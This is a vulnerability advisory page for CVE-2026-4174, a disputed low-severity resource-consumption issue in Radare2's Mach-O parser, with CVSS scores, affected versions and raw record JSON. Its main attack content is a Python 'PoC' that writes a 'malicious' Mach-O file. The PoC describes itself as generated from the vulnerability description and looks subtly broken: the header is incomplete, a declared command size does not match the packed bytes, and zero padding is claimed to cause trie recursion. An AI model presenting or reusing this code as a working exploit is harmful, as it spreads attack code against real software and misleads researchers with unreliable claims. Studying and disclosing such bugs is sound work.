Security Vulnerability Report
CVE-2026-4174 CVSS 3.3 LOW

Published: 2026-03-16 14:19:58
Last Modified: 2026-04-29 01:00:02

Description

A vulnerability has been found in Radare2 5.9.9. This issue affects the function walk_exports_trie of the file libr/bin/format/mach0/mach0.c of the component Mach-O File Parser. Such manipulation leads to resource consumption. The attack can only be performed from a local environment. The exploit has been disclosed to the public and may be used. The existence of this vulnerability is still disputed at present. Upgrading to version 6.1.2 is capable of addressing this issue. The name of the patch is 4371ae84c99c46b48cb21badbbef06b30757aba0. You should upgrade the affected component. The code maintainer states that, "[he] wont consider this bug a DoS".

CVSS Details

CVSS Score: 3.3
Severity: LOW
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

No configuration data available.

Radare2 < 5.9.10
Radare2 5.9.9
Radare2 < 6.1.2 (recommended upgrade version)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2026-4174 PoC - Radare2 Mach-O Parser Resource Consumption
Generated PoC based on vulnerability description
"""

import struct
import sys


def create_malicious_macho():
    """
    Generate a malicious Mach-O file that triggers resource consumption
    in Radare2's walk_exports_trie function
    """
    # Mach-O magic number (64-bit)
    MAGIC = 0xfeedfacf
    CPU_TYPE_X86_64 = 0x01000007
    CPU_SUBTYPE_ALL = 0x80000003
    FILE_TYPE_DYLIB = 0xf

    # Create a minimal 64-bit Mach-O header
    header = struct.pack('<IIIII',
        MAGIC,            # magic
        CPU_TYPE_X86_64,  # cputype
        CPU_SUBTYPE_ALL,  # cpusubtype
        FILE_TYPE_DYLIB,  # filetype
        1                 # ncmds
    )

    # Load command - LC_DYSYMTAB (symbol table)
    cmd_size = 24
    cmd_data = struct.pack('<IIII',
        0x0B,      # cmd (LC_DYSYMTAB)
        cmd_size,  # cmdsize
        0,         # ilocalsym
        0          # iextdefsym
    )

    # Create exports trie section with malformed data
    # This triggers excessive recursion in walk_exports_trie
    malformed_export = b'\x00' * 1000  # Padding to cause recursion

    print('[+] Malicious Mach-O file structure created')
    print('[+] This file targets walk_exports_trie function in libr/bin/format/mach0/mach0.c')
    print('[+] When opened by Radare2, it may cause resource exhaustion')

    return header + cmd_data + malformed_export


if __name__ == '__main__':
    print('CVE-2026-4174 PoC Generator')
    print('Target: Radare2 < 6.1.2')
    print('Component: Mach-O File Parser (walk_exports_trie)')

    malicious_data = create_malicious_macho()

    output_file = 'malicious.mach-o'
    with open(output_file, 'wb') as f:
        f.write(malicious_data)

    print(f'[+] PoC written to: {output_file}')

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-4174", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:19:57.890", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["disputed"]}], "descriptions": [{"lang": "en", "value": "A vulnerability has been found in Radare2 5.9.9. This issue affects the function walk_exports_trie of the file libr/bin/format/mach0/mach0.c of the component Mach-O File Parser. Such manipulation leads to resource consumption. The attack can only be performed from a local environment. The exploit has been disclosed to the public and may be used. The existence of this vulnerability is still disputed at present. Upgrading to version 6.1.2 is capable of addressing this issue. The name of the patch is 4371ae84c99c46b48cb21badbbef06b30757aba0. You should upgrade the affected component. The code maintainer states that, \"[he] wont consider this bug a DoS\"."}, {"lang": "es", "value": "Se ha encontrado una vulnerabilidad en Radare2 5.9.9. Este problema afecta a la función walk_exports_trie del archivo libr/bin/format/mach0/mach0.c del componente Mach-O File Parser. Dicha manipulación conduce al consumo de recursos. El ataque solo puede realizarse desde un entorno local. El exploit ha sido divulgado al público y puede ser utilizado. La existencia de esta vulnerabilidad aún está en disputa actualmente. La actualización a la versión 6.1.2 es capaz de abordar este problema. El nombre del parche es 4371ae84c99c46b48cb21badbbef06b30757aba0. Debería actualizar el componente afectado. 
El mantenedor del código afirma que, 'no considerará este error un DoS'."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.9, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "baseScore": 3.3, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", 
"integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:L/AC:L/Au:S/C:N/I:N/A:P", "baseScore": 1.7, "accessVector": "LOCAL", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "PARTIAL"}, "baseSeverity": "LOW", "exploitabilityScore": 3.1, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-400"}, {"lang": "en", "value": "CWE-404"}]}], "references": [{"url": "https://github.com/ToddAWalter/radare2/commit/4371ae84c99c46b48cb21badbbef06b30757aba0", "source": "[email protected]"}, {"url": "https://github.com/radareorg/radare2/issues/25482", "source": "[email protected]"}, {"url": "https://github.com/radareorg/radare2/milestone/94", "source": "[email protected]"}, {"url": "https://github.com/user-attachments/files/25620145/gen_macho_poc.py", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.351081", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.351081", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.769799", " ... (truncated)